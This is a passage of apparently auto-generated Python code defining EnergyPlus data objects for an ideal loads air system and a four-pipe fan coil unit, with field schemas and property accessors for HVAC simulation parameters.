'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'dehumidification control type',
{'name': u'Dehumidification Control Type',
'pyname': u'dehumidification_control_type',
'default': u'ConstantSensibleHeatRatio',
'required-field': False,
'autosizable': False,
'accepted-values': [u'ConstantSensibleHeatRatio',
u'Humidistat',
u'None',
u'ConstantSupplyHumidityRatio'],
'autocalculatable': False,
'type': 'alpha'}),
(u'cooling sensible heat ratio',
{'name': u'Cooling Sensible Heat Ratio',
'pyname': u'cooling_sensible_heat_ratio',
'default': 0.7,
'minimum>': 0.0,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'humidification control type',
{'name': u'Humidification Control Type',
'pyname': u'humidification_control_type',
'default': u'None',
'required-field': False,
'autosizable': False,
'accepted-values': [u'None',
u'Humidistat',
u'ConstantSupplyHumidityRatio'],
'autocalculatable': False,
'type': 'alpha'}),
(u'design specification outdoor air object name',
{'name': u'Design Specification Outdoor Air Object Name',
'pyname': u'design_specification_outdoor_air_object_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'outdoor air inlet node name',
{'name': u'Outdoor Air Inlet Node Name',
'pyname': u'outdoor_air_inlet_node_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'demand controlled ventilation type',
{'name': u'Demand Controlled Ventilation Type',
'pyname': u'demand_controlled_ventilation_type',
'default': u'None',
'required-field': False,
'autosizable': False,
'accepted-values': [u'None',
u'OccupancySchedule',
u'CO2Setpoint'],
'autocalculatable': False,
'type': 'alpha'}),
(u'outdoor air economizer type',
{'name': u'Outdoor Air Economizer Type',
'pyname': u'outdoor_air_economizer_type',
'default': u'NoEconomizer',
'required-field': False,
'autosizable': False,
'accepted-values': [u'NoEconomizer',
u'DifferentialDryBulb',
u'DifferentialEnthalpy'],
'autocalculatable': False,
'type': 'alpha'}),
(u'heat recovery type',
{'name': u'Heat Recovery Type',
'pyname': u'heat_recovery_type',
'default': u'None',
'required-field': False,
'autosizable': False,
'accepted-values': [u'None',
u'Sensible',
u'Enthalpy'],
'autocalculatable': False,
'type': 'alpha'}),
(u'sensible heat recovery effectiveness',
{'name': u'Sensible Heat Recovery Effectiveness',
'pyname': u'sensible_heat_recovery_effectiveness',
'default': 0.7,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'latent heat recovery effectiveness',
{'name': u'Latent Heat Recovery Effectiveness',
'pyname': u'latent_heat_recovery_effectiveness',
'default': 0.65,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'design specification zonehvac sizing object name',
{'name': u'Design Specification ZoneHVAC Sizing Object Name',
'pyname': u'design_specification_zonehvac_sizing_object_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'})]),
'format': None,
'group': u'Zone HVAC Forced Air Units',
'min-fields': 26,
'name': u'ZoneHVAC:IdealLoadsAirSystem',
'pyname': u'ZoneHvacIdealLoadsAirSystem',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def availability_schedule_name(self):
"""field `Availability Schedule Name`
| Availability schedule name for this system. Schedule value > 0 means the system is available.
| If this field is blank, the system is always available.
Args:
value (str): value for IDD Field `Availability Schedule Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `availability_schedule_name` or None if not set
"""
return self["Availability Schedule Name"]
@availability_schedule_name.setter
def availability_schedule_name(self, value=None):
"""Corresponds to IDD field `Availability Schedule Name`"""
self["Availability Schedule Name"] = value
@property
def zone_supply_air_node_name(self):
"""field `Zone Supply Air Node Name`
| Must match a zone air inlet node name.
Args:
value (str): value for IDD Field `Zone Supply Air Node Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `zone_supply_air_node_name` or None if not set
"""
return self["Zone Supply Air Node Name"]
@zone_supply_air_node_name.setter
def zone_supply_air_node_name(self, value=None):
"""Corresponds to IDD field `Zone Supply Air Node Name`"""
self["Zone Supply Air Node Name"] = value
@property
def zone_exhaust_air_node_name(self):
"""field `Zone Exhaust Air Node Name`
| Should match a zone air exhaust node name.
| This field is optional, but is required if this
| this object is used with other forced air equipment.
Args:
value (str): value for IDD Field `Zone Exhaust Air Node Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `zone_exhaust_air_node_name` or None if not set
"""
return self["Zone Exhaust Air Node Name"]
@zone_exhaust_air_node_name.setter
def zone_exhaust_air_node_name(self, value=None):
"""Corresponds to IDD field `Zone Exhaust Air Node Name`"""
self["Zone Exhaust Air Node Name"] = value
@property
def maximum_heating_supply_air_temperature(self):
"""field `Maximum Heating Supply Air Temperature`
| Units: C
| Default value: 50.0
| value < 100.0
Args:
value (float): value for IDD Field `Maximum Heating Supply Air Temperature`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `maximum_heating_supply_air_temperature` or None if not set
"""
return self["Maximum Heating Supply Air Temperature"]
@maximum_heating_supply_air_temperature.setter
def maximum_heating_supply_air_temperature(self, value=50.0):
"""Corresponds to IDD field `Maximum Heating Supply Air Temperature`"""
self["Maximum Heating Supply Air Temperature"] = value
@property
def minimum_cooling_supply_air_temperature(self):
"""field `Minimum Cooling Supply Air Temperature`
| Units: C
| Default value: 13.0
| value > -100.0
| value < 50.0
Args:
value (float): value for IDD Field `Minimum Cooling Supply Air Temperature`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `minimum_cooling_supply_air_temperature` or None if not set
"""
return self["Minimum Cooling Supply Air Temperature"]
@minimum_cooling_supply_air_temperature.setter
def minimum_cooling_supply_air_temperature(self, value=13.0):
"""Corresponds to IDD field `Minimum Cooling Supply Air Temperature`"""
self["Minimum Cooling Supply Air Temperature"] = value
@property
def maximum_heating_supply_air_humidity_ratio(self):
"""field `Maximum Heating Supply Air Humidity Ratio`
| Units: kgWater/kgDryAir
| Default value: 0.0156
Args:
value (float): value for IDD Field `Maximum Heating Supply Air Humidity Ratio`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `maximum_heating_supply_air_humidity_ratio` or None if not set
"""
return self["Maximum Heating Supply Air Humidity Ratio"]
@maximum_heating_supply_air_humidity_ratio.setter
def maximum_heating_supply_air_humidity_ratio(self, value=0.0156):
"""Corresponds to IDD field `Maximum Heating Supply Air Humidity
Ratio`"""
self["Maximum Heating Supply Air Humidity Ratio"] = value
@property
def minimum_cooling_supply_air_humidity_ratio(self):
"""field `Minimum Cooling Supply Air Humidity Ratio`
| Units: kgWater/kgDryAir
| Default value: 0.0077
Args:
value (float): value for IDD Field `Minimum Cooling Supply Air Humidity Ratio`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `minimum_cooling_supply_air_humidity_ratio` or None if not set
"""
return self["Minimum Cooling Supply Air Humidity Ratio"]
@minimum_cooling_supply_air_humidity_ratio.setter
def minimum_cooling_supply_air_humidity_ratio(self, value=0.0077):
"""Corresponds to IDD field `Minimum Cooling Supply Air Humidity
Ratio`"""
self["Minimum Cooling Supply Air Humidity Ratio"] = value
@property
def heating_limit(self):
"""field `Heating Limit`
| Default value: NoLimit
Args:
value (str): value for IDD Field `Heating Limit`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `heating_limit` or None if not set
"""
return self["Heating Limit"]
@heating_limit.setter
def heating_limit(self, value="NoLimit"):
"""Corresponds to IDD field `Heating Limit`"""
self["Heating Limit"] = value
@property
def maximum_heating_air_flow_rate(self):
"""field `Maximum Heating Air Flow Rate`
| This field is ignored if Heating Limit = NoLimit
| If this field is blank, there is no limit.
| Units: m3/s
Args:
value (float or "Autosize"): value for IDD Field `Maximum Heating Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `maximum_heating_air_flow_rate` or None if not set
"""
return self["Maximum Heating Air Flow Rate"]
@maximum_heating_air_flow_rate.setter
def maximum_heating_air_flow_rate(self, value=None):
"""Corresponds to IDD field `Maximum Heating Air Flow Rate`"""
self["Maximum Heating Air Flow Rate"] = value
@property
def maximum_sensible_heating_capacity(self):
"""field `Maximum Sensible Heating Capacity`
| This field is ignored if Heating Limit = NoLimit
| If this field is blank, there is no limit.
| Units: W
Args:
value (float or "Autosize"): value for IDD Field `Maximum Sensible Heating Capacity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `maximum_sensible_heating_capacity` or None if not set
"""
return self["Maximum Sensible Heating Capacity"]
@maximum_sensible_heating_capacity.setter
def maximum_sensible_heating_capacity(self, value=None):
"""Corresponds to IDD field `Maximum Sensible Heating Capacity`"""
self["Maximum Sensible Heating Capacity"] = value
@property
def cooling_limit(self):
"""field `Cooling Limit`
| Default value: NoLimit
Args:
value (str): value for IDD Field `Cooling Limit`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `cooling_limit` or None if not set
"""
return self["Cooling Limit"]
@cooling_limit.setter
def cooling_limit(self, value="NoLimit"):
"""Corresponds to IDD field `Cooling Limit`"""
self["Cooling Limit"] = value
@property
def maximum_cooling_air_flow_rate(self):
"""field `Maximum Cooling Air Flow Rate`
| This field is ignored if Cooling Limit = NoLimit
| This field is required if Outdoor Air Economizer Type is anything other than NoEconomizer.
| Units: m3/s
Args:
value (float or "Autosize"): value for IDD Field `Maximum Cooling Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `maximum_cooling_air_flow_rate` or None if not set
"""
return self["Maximum Cooling Air Flow Rate"]
@maximum_cooling_air_flow_rate.setter
def maximum_cooling_air_flow_rate(self, value=None):
"""Corresponds to IDD field `Maximum Cooling Air Flow Rate`"""
self["Maximum Cooling Air Flow Rate"] = value
@property
def maximum_total_cooling_capacity(self):
"""field `Maximum Total Cooling Capacity`
| This field is ignored if Cooling Limit = NoLimit
| Units: W
Args:
value (float or "Autosize"): value for IDD Field `Maximum Total Cooling Capacity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `maximum_total_cooling_capacity` or None if not set
"""
return self["Maximum Total Cooling Capacity"]
@maximum_total_cooling_capacity.setter
def maximum_total_cooling_capacity(self, value=None):
"""Corresponds to IDD field `Maximum Total Cooling Capacity`"""
self["Maximum Total Cooling Capacity"] = value
@property
def heating_availability_schedule_name(self):
"""field `Heating Availability Schedule Name`
| If blank, heating is always available.
Args:
value (str): value for IDD Field `Heating Availability Schedule Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `heating_availability_schedule_name` or None if not set
"""
return self["Heating Availability Schedule Name"]
@heating_availability_schedule_name.setter
def heating_availability_schedule_name(self, value=None):
"""Corresponds to IDD field `Heating Availability Schedule Name`"""
self["Heating Availability Schedule Name"] = value
@property
def cooling_availability_schedule_name(self):
"""field `Cooling Availability Schedule Name`
| If blank, cooling is always available.
Args:
value (str): value for IDD Field `Cooling Availability Schedule Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `cooling_availability_schedule_name` or None if not set
"""
return self["Cooling Availability Schedule Name"]
@cooling_availability_schedule_name.setter
def cooling_availability_schedule_name(self, value=None):
"""Corresponds to IDD field `Cooling Availability Schedule Name`"""
self["Cooling Availability Schedule Name"] = value
@property
def dehumidification_control_type(self):
"""field `Dehumidification Control Type`
| ConstantSensibleHeatRatio means that the ideal loads system
| will be controlled to meet the sensible cooling load, and the
| latent cooling rate will be computed using a constant
| sensible heat ratio (SHR)
| Humidistat means that there is a ZoneControl:Humidistat for this
| zone and the ideal loads system will attempt to satisfy the humidistat.
| None means that there is no dehumidification.
| ConstantSupplyHumidityRatio means that during cooling the supply air
| will always be at the Minimum Cooling Supply Humidity Ratio.
| Default value: ConstantSensibleHeatRatio
Args:
value (str): value for IDD Field `Dehumidification Control Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `dehumidification_control_type` or None if not set
"""
return self["Dehumidification Control Type"]
@dehumidification_control_type.setter
def dehumidification_control_type(self, value="ConstantSensibleHeatRatio"):
"""Corresponds to IDD field `Dehumidification Control Type`"""
self["Dehumidification Control Type"] = value
@property
def cooling_sensible_heat_ratio(self):
"""field `Cooling Sensible Heat Ratio`
| This field is applicable only when Dehumidification Control Type is ConstantSensibleHeatRatio
| Units: dimensionless
| Default value: 0.7
| value <= 1.0
Args:
value (float): value for IDD Field `Cooling Sensible Heat Ratio`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `cooling_sensible_heat_ratio` or None if not set
"""
return self["Cooling Sensible Heat Ratio"]
@cooling_sensible_heat_ratio.setter
def cooling_sensible_heat_ratio(self, value=0.7):
"""Corresponds to IDD field `Cooling Sensible Heat Ratio`"""
self["Cooling Sensible Heat Ratio"] = value
@property
def humidification_control_type(self):
"""field `Humidification Control Type`
| None means that there is no humidification.
| Humidistat means that there is a ZoneControl:Humidistat for this
| zone and the ideal loads system will attempt to satisfy the humidistat.
| ConstantSupplyHumidityRatio means that during heating the supply air
| will always be at the Maximum Heating Supply Humidity Ratio.
| Default value: None
Args:
value (str): value for IDD Field `Humidification Control Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `humidification_control_type` or None if not set
"""
return self["Humidification Control Type"]
@humidification_control_type.setter
def humidification_control_type(self, value="None"):
"""Corresponds to IDD field `Humidification Control Type`"""
self["Humidification Control Type"] = value
@property
def design_specification_outdoor_air_object_name(self):
"""field `Design Specification Outdoor Air Object Name`
| When the name of a DesignSpecification:OutdoorAir object is entered, the minimum
| outdoor air flow rate will be computed using these specifications. The outdoor air
| flow rate will also be affected by the next two fields.
| If this field is blank, there will be no outdoor air and the remaining fields will
| be ignored.
Args:
value (str): value for IDD Field `Design Specification Outdoor Air Object Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `design_specification_outdoor_air_object_name` or None if not set
"""
return self["Design Specification Outdoor Air Object Name"]
@design_specification_outdoor_air_object_name.setter
def design_specification_outdoor_air_object_name(self, value=None):
"""Corresponds to IDD field `Design Specification Outdoor Air Object
Name`"""
self["Design Specification Outdoor Air Object Name"] = value
@property
def outdoor_air_inlet_node_name(self):
"""field `Outdoor Air Inlet Node Name`
| This field is required if the system provides outdoor air
| Enter the name of an outdoor air node. This node name is also specified in
| an OutdoorAir:Node or OutdoorAir:NodeList object.
Args:
value (str): value for IDD Field `Outdoor Air Inlet Node Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `outdoor_air_inlet_node_name` or None if not set
"""
return self["Outdoor Air Inlet Node Name"]
@outdoor_air_inlet_node_name.setter
def outdoor_air_inlet_node_name(self, value=None):
"""Corresponds to IDD field `Outdoor Air Inlet Node Name`"""
self["Outdoor Air Inlet Node Name"] = value
@property
def demand_controlled_ventilation_type(self):
"""field `Demand Controlled Ventilation Type`
| This field controls how the minimum outdoor air flow rate is calculated.
| None means that design occupancy will be used to compute the minimum outdoor air flow rate
| OccupancySchedule means that current occupancy level will be used.
| CO2Setpoint means that the design occupancy will be used to compute the minimum outdoor air flow
| rate and the outdoor air flow rate may be increased if necessary to maintain the indoor air carbon
| dioxide setpoint defined in a ZoneControl:ContaminantController object.
| Default value: None
Args:
value (str): value for IDD Field `Demand Controlled Ventilation Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `demand_controlled_ventilation_type` or None if not set
"""
return self["Demand Controlled Ventilation Type"]
@demand_controlled_ventilation_type.setter
def demand_controlled_ventilation_type(self, value="None"):
"""Corresponds to IDD field `Demand Controlled Ventilation Type`"""
self["Demand Controlled Ventilation Type"] = value
@property
def outdoor_air_economizer_type(self):
"""field `Outdoor Air Economizer Type`
| DifferentialDryBulb and DifferentialEnthalpy will increase the outdoor air flow rate
| when there is a cooling load and the outdoor air temperature or enthalpy
| is below the zone exhaust air temperature or enthalpy.
| Default value: NoEconomizer
Args:
value (str): value for IDD Field `Outdoor Air Economizer Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `outdoor_air_economizer_type` or None if not set
"""
return self["Outdoor Air Economizer Type"]
@outdoor_air_economizer_type.setter
def outdoor_air_economizer_type(self, value="NoEconomizer"):
"""Corresponds to IDD field `Outdoor Air Economizer Type`"""
self["Outdoor Air Economizer Type"] = value
@property
def heat_recovery_type(self):
"""field `Heat Recovery Type`
| Default value: None
Args:
value (str): value for IDD Field `Heat Recovery Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `heat_recovery_type` or None if not set
"""
return self["Heat Recovery Type"]
@heat_recovery_type.setter
def heat_recovery_type(self, value="None"):
"""Corresponds to IDD field `Heat Recovery Type`"""
self["Heat Recovery Type"] = value
@property
def sensible_heat_recovery_effectiveness(self):
"""field `Sensible Heat Recovery Effectiveness`
| Units: dimensionless
| Default value: 0.7
| value <= 1.0
Args:
value (float): value for IDD Field `Sensible Heat Recovery Effectiveness`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `sensible_heat_recovery_effectiveness` or None if not set
"""
return self["Sensible Heat Recovery Effectiveness"]
@sensible_heat_recovery_effectiveness.setter
def sensible_heat_recovery_effectiveness(self, value=0.7):
"""Corresponds to IDD field `Sensible Heat Recovery Effectiveness`"""
self["Sensible Heat Recovery Effectiveness"] = value
@property
def latent_heat_recovery_effectiveness(self):
"""field `Latent Heat Recovery Effectiveness`
| Applicable only if Heat Recovery Type is Enthalpy.
| Units: dimensionless
| Default value: 0.65
| value <= 1.0
Args:
value (float): value for IDD Field `Latent Heat Recovery Effectiveness`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `latent_heat_recovery_effectiveness` or None if not set
"""
return self["Latent Heat Recovery Effectiveness"]
@latent_heat_recovery_effectiveness.setter
def latent_heat_recovery_effectiveness(self, value=0.65):
"""Corresponds to IDD field `Latent Heat Recovery Effectiveness`"""
self["Latent Heat Recovery Effectiveness"] = value
@property
def design_specification_zonehvac_sizing_object_name(self):
"""field `Design Specification ZoneHVAC Sizing Object Name`
| Enter the name of a DesignSpecificationZoneHVACSizing object.
Args:
value (str): value for IDD Field `Design Specification ZoneHVAC Sizing Object Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `design_specification_zonehvac_sizing_object_name` or None if not set
"""
return self["Design Specification ZoneHVAC Sizing Object Name"]
@design_specification_zonehvac_sizing_object_name.setter
def design_specification_zonehvac_sizing_object_name(self, value=None):
"""Corresponds to IDD field `Design Specification ZoneHVAC Sizing
Object Name`"""
self["Design Specification ZoneHVAC Sizing Object Name"] = value
class ZoneHvacFourPipeFanCoil(DataObject):
""" Corresponds to IDD object `ZoneHVAC:FourPipeFanCoil`
Four pipe fan coil system. Forced-convection hydronic heating-cooling unit with
supply fan, hot water heating coil, chilled water cooling coil, and fixed-position
outdoor air mixer.
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': 'alpha'}),
(u'availability schedule name',
{'name': u'Availability Schedule Name',
'pyname': u'availability_schedule_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'capacity control method',
{'name': u'Capacity Control Method',
'pyname': u'capacity_control_method',
'required-field': True,
'autosizable': False,
'accepted-values': [u'ConstantFanVariableFlow',
u'CyclingFan',
u'VariableFanVariableFlow',
u'VariableFanConstantFlow',
u'MultiSpeedFan'],
'autocalculatable': False,
'type': 'alpha'}),
(u'maximum supply air flow rate',
{'name': u'Maximum Supply Air Flow Rate',
'pyname': u'maximum_supply_air_flow_rate',
'required-field': True,
'autosizable': True,
'autocalculatable': False,
'type': 'real',
'unit': u'm3/s'}),
(u'low speed supply air flow ratio',
{'name': u'Low Speed Supply Air Flow Ratio',
'pyname': u'low_speed_supply_air_flow_ratio',
'default': 0.33,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real'}),
(u'medium speed supply air flow ratio',
{'name': u'Medium Speed Supply Air Flow Ratio',
'pyname': u'medium_speed_supply_air_flow_ratio',
'default': 0.66,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real'}),
(u'maximum outdoor air flow rate',
{'name': u'Maximum Outdoor Air Flow Rate',
'pyname': u'maximum_outdoor_air_flow_rate',
'required-field': True,
'autosizable': True,
'autocalculatable': False,
'type': 'real',
'unit': u'm3/s'}),
(u'outdoor air schedule name',
{'name': u'Outdoor Air Schedule Name',
'pyname': u'outdoor_air_schedule_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'air inlet node name',
{'name': u'Air Inlet Node Name',
'pyname': u'air_inlet_node_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'air outlet node name',
{'name': u'Air Outlet Node Name',
'pyname': u'air_outlet_node_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'outdoor air mixer object type',
{'name': u'Outdoor Air Mixer Object Type',
'pyname': u'outdoor_air_mixer_object_type',
'required-field': False,
'autosizable': False,
'accepted-values': [u'OutdoorAir:Mixer'],
'autocalculatable': False,
'type': 'alpha'}),
(u'outdoor air mixer name',
{'name': u'Outdoor Air Mixer Name',
'pyname': u'outdoor_air_mixer_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'supply air fan object type',
{'name': u'Supply Air Fan Object Type',
'pyname': u'supply_air_fan_object_type',
'required-field': True,
'autosizable': False,
'accepted-values': [u'Fan:OnOff',
u'Fan:ConstantVolume',
u'Fan:VariableVolume'],
'autocalculatable': False,
'type': 'alpha'}),
(u'supply air fan name',
{'name': u'Supply Air Fan Name',
'pyname': u'supply_air_fan_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'cooling coil object type',
{'name': u'Cooling Coil Object Type',
'pyname': u'cooling_coil_object_type',
'required-field': True,
'autosizable': False,
'accepted-values': [u'Coil:Cooling:Water',
u'Coil:Cooling:Water:DetailedGeometry',
u'CoilSystem:Cooling:Water:HeatExchangerAssisted'],
'autocalculatable': False,
'type': 'alpha'}),
(u'cooling coil name',
{'name': u'Cooling Coil Name',
'pyname': u'cooling_coil_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'maximum cold water flow rate',
{'name': u'Maximum Cold Water Flow Rate',
'pyname': u'maximum_cold_water_flow_rate',
'required-field': True,
'autosizable': True,
'autocalculatable': False,
'type': 'real',
'unit': u'm3/s'}),
(u'minimum cold water flow rate',
{'name': u'Minimum Cold Water Flow Rate',
'pyname': u'minimum_cold_water_flow_rate',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'm3/s'}),
(u'cooling convergence tolerance',
{'name': u'Cooling Convergence Tolerance',
'pyname': u'cooling_convergence_tolerance',
'default': 0.001,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real'}),
(u'heating coil object type',
{'name': u'Heating Coil Object Type',
'pyname': u'heating_coil_object_type',
'required-field': True,
'autosizable': False,
'accepted-values': [u'Coil:Heating:Water',
u'Coil:Heating:Electric'],
'autocalculatable': False,
'type': 'alpha'}),
(u'heating coil name',
{'name': u'Heating Coil Name',
'pyname': u'heating_coil_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'maximum hot water flow rate',
{'name': u'Maximum Hot Water Flow Rate',
'pyname': u'maximum_hot_water_flow_rate',
'required-field': True,
'autosizable': True,
'autocalculatable': False,
'type': 'real',
'unit': u'm3/s'}),
(u'minimum hot water flow rate',
{'name': u'Minimum Hot Water Flow Rate',
'pyname': u'minimum_hot_water_flow_rate',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'm3/s'}),
(u'heating convergence tolerance',
{'name': u'Heating Convergence Tolerance',
'pyname': u'heating_convergence_tolerance',
'default': 0.001,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real'}),
(u'availability manager list name',
{'name': u'Availability Manager List Name',
'pyname': u'availability_manager_list_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'design specification zonehvac sizing object name',
{'name': u'Design Specification ZoneHVAC Sizing Object Name',
'pyname': u'design_specification_zonehvac_sizing_object_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'supply air fan operating mode schedule name',
{'name': u'Supply Air Fan Operating Mode Schedule Name',
'pyname': u'supply_air_fan_operating_mode_schedule_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'})]),
'format': None,
'group': u'Zone HVAC Forced Air Units',
'min-fields': 24,
'name': u'ZoneHVAC:FourPipeFanCoil',
'pyname': u'ZoneHvacFourPipeFanCoil',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def availability_schedule_name(self):
"""field `Availability Schedule Name`
| Availability schedule name for this system. Schedule value > 0 means the system is available.
| If this field is blank, the system is always available.
Args:
value (str): value for IDD Field `Availability Schedule Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `availability_schedule_name` or None if not set
"""
return self["Availability Schedule Name"]
@availability_schedule_name.setter
def availability_schedule_name(self, value=None):
"""Corresponds to IDD field `Availability Schedule Name`"""
self["Availability Schedule Name"] = value
@property
def capacity_control_method(self):
"""field `Capacity Control Method`
Args:
value (str): value for IDD Field `Capacity Control Method`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `capacity_control_method` or None if not set
"""
return self["Capacity Control Method"]
@capacity_control_method.setter
def capacity_control_method(self, value=None):
"""Corresponds to IDD field `Capacity Control Method`"""
self["Capacity Control Method"] = value
@property
def maximum_supply_air_flow_rate(self):
"""field `Maximum Supply Air Flow Rate`
| Units: m3/s
Args:
value (float or "Autosize"): value for IDD Field `Maximum Supply Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `maximum_supply_air_flow_rate` or None if not set
"""
return self["Maximum Supply Air Flow Rate"]
@maximum_supply_air_flow_rate.setter
def maximum_supply_air_flow_rate(self, value=None):
"""Corresponds to IDD field `Maximum Supply Air Flow Rate`"""
self["Maximum Supply Air Flow Rate"] = value
@property
def low_speed_supply_air_flow_ratio(self):
"""field `Low Speed Supply Air Flow Ratio`
| Default value: 0.33
Args:
value (float): value for IDD Field `Low Speed Supply Air Flow Ratio`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `low_speed_supply_air_flow_ratio` or None if not set
"""
return self["Low Speed Supply Air Flow Ratio"]
@low_speed_supply_air_flow_ratio.setter
def low_speed_supply_air_flow_ratio(self, value=0.33):
"""Corresponds to IDD field `Low Speed Supply Air Flow Ratio`"""
self["Low Speed Supply Air Flow Ratio"] = value
@property
def medium_speed_supply_air_flow_ratio(self):
"""field `Medium Speed Supply Air Flow Ratio`
| Medium Speed Supply Air Flow Ratio should be greater
| than Low Speed Supply Air Flow Ratio
| Default value: 0.66
Args:
value (float): value for IDD Field `Medium Speed Supply Air Flow Ratio`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `medium_speed_supply_air_flow_ratio` or None if not set
"""
return self["Medium Speed Supply Air Flow Ratio"]
@medium_speed_supply_air_flow_ratio.setter
def medium_speed_supply_air_flow_ratio(self, value=0.66):
"""Corresponds to IDD field `Medium Speed Supply Air Flow Ratio`"""
self["Medium Speed Supply Air Flow Ratio"] = value
@property
def maximum_outdoor_air_flow_rate(self):
"""field `Maximum Outdoor Air Flow Rate`
| Units: m3/s
Args:
value (float or "Autosize"): value for IDD Field `Maximum Outdoor Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `maximum_outdoor_air_flow_rate` or None if not set
"""
return self["Maximum Outdoor Air Flow Rate"]
@maximum_outdoor_air_flow_rate.setter
def maximum_outdoor_air_flow_rate(self, value=None):
"""Corresponds to IDD field `Maximum Outdoor Air Flow Rate`"""
self["Maximum Outdoor Air Flow Rate"] = value
@property
def outdoor_air_schedule_name(self):
"""field `Outdoor Air Schedule Name`
| Value of schedule multiplies maximum outdoor air flow rate
Args:
value (str): value for IDD Field `Outdoor Air Schedule Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `outdoor_air_schedule_name` or None if not set
"""
return self["Outdoor Air Schedule Name"]
@outdoor_air_schedule_name.setter
def outdoor_air_schedule_name(self, value=None):
"""Corresponds to IDD field `Outdoor Air Schedule Name`"""
self["Outdoor Air Schedule Name"] = value
@property
def air_inlet_node_name(self):
"""field `Air Inlet Node Name`
Args:
value (str): value for IDD Field `Air Inlet Node Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `air_inlet_node_name` or None if not set
"""
return self["Air Inlet Node Name"]
@air_inlet_node_name.setter
def air_inlet_node_name(self, value=None):
"""Corresponds to IDD field `Air Inlet Node Name`"""
self["Air Inlet Node Name"] = value
@property
def air_outlet_node_name(self):
"""field `Air Outlet Node Name`
Args:
value (str): value for IDD Field `Air Outlet Node Name`
Raises:
